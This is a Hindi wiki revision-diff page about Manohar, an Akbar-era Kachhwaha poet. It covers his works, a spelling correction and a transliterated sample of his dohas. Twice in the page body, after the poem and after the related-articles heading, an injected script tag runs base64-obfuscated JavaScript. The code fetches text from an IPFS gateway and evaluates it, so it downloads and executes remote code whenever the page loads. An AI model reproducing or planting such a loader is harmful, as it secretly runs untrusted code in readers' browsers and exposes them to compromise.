Difference between revisions of "मनोहर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:भक्ति काल (को हटा दिया गया हैं।))
m (Text replace - "श्रृंगार" to "शृंगार")
Line 1: Line 1:
 
*मनोहर कवि एक कछवाहे सरदार थे जो [[अकबर]] के दरबार में रहा करते थे।  
 
*मनोहर कवि एक कछवाहे सरदार थे जो [[अकबर]] के दरबार में रहा करते थे।  
 
*'शिवसिंह सरोज' में लिखा है कि ये [[फ़ारसी भाषा|फारसी]] और [[संस्कृत]] के अच्छे विद्वान थे और फारसी कविता में अपना उपनाम 'तौसनी' रखते थे।  
 
*'शिवसिंह सरोज' में लिखा है कि ये [[फ़ारसी भाषा|फारसी]] और [[संस्कृत]] के अच्छे विद्वान थे और फारसी कविता में अपना उपनाम 'तौसनी' रखते थे।  
*इन्होंने 'शतप्रश्नोत्तरी' नामक पुस्तक लिखी है तथा नीति और श्रृंगार रस के बहुत से फुटकर दोहे कहे हैं।  
+
*इन्होंने 'शतप्रश्नोत्तरी' नामक पुस्तक लिखी है तथा नीति और शृंगार रस के बहुत से फुटकर दोहे कहे हैं।  
 
*इनका कविता काल संवत 1620 के आगे माना जा सकता है।  
 
*इनका कविता काल संवत 1620 के आगे माना जा सकता है।  
*इनके श्रृंगारिक दोहे मार्मिक और मधुर हैं पर उनमें कुछ फारसी के छींटे मौजूद हैं। उदाहरणार्थ -  
+
*इनके शृंगारिक दोहे मार्मिक और मधुर हैं पर उनमें कुछ फारसी के छींटे मौजूद हैं। उदाहरणार्थ -  
 
<poem>इंदु बदन, नरगिस नयन, संबुलवारे बार,
 
<poem>इंदु बदन, नरगिस नयन, संबुलवारे बार,
 
उर कुंकुम, कोकिल बयन, जेहि लखि लाजत मार।
 
उर कुंकुम, कोकिल बयन, जेहि लखि लाजत मार।

Revision as of 13:20, 25 June 2013

  • manohar kavi ek kachhavahe saradar the jo akabar ke darabar mean raha karate the.
  • 'shivasianh saroj' mean likha hai ki ye pharasi aur sanskrit ke achchhe vidvan the aur pharasi kavita mean apana upanam 'tausani' rakhate the.
  • inhoanne 'shataprashnottari' namak pustak likhi hai tatha niti aur shriangar ras ke bahut se phutakar dohe kahe haian.
  • inaka kavita kal sanvat 1620 ke age mana ja sakata hai.
  • inake shriangarik dohe marmik aur madhur haian par unamean kuchh pharasi ke chhiante maujood haian. udaharanarth -

iandu badan, naragis nayan, sanbulavare bar,
ur kuankum, kokil bayan, jehi lakhi lajat mar.
bithure suthure chikane ghane ghane ghughuvar,
rasikan ko janjir se bala tere bar.
acharaj mohian hiandoo turuk badi karat sangram,
ik dipati soan dipiyat kaba kashidham.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>